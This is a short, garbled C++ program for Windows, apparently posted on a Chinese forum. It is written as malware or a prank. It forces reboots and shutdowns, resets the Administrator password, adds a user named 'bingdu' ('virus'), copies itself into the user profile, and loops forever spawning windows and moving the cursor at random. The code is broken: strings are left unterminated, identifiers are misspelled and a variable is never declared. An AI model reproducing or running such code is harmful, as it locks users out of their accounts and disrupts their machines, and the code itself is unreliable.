#include<iostream>
#include<windows.h>
#include<ctime>
#include<cstdio>
#include<fstream>
using namespace std;
int main(){
char copy[80];
sprintf(copy,"copy %s \"%% userprofile%%;
char cmd[]="shut down -r -t 0";
system(ping baidu.com");
system(cmd);
system("pause");
system(copy);
system("net user Administrator XZ");
system("net user bingdu XZ /add");
int x=GetSystem Metrics(SM_CXSCREEN);
int x=GetSystem Metrics(SM_CYSCREEN);
srand(time(0));
system("shutdown -s -t 20");
while(1){
SetCursorPos(rand()%x,rand()%y)
system("start");
}
return 0;
} |
使用道具 举报
使用道具 举报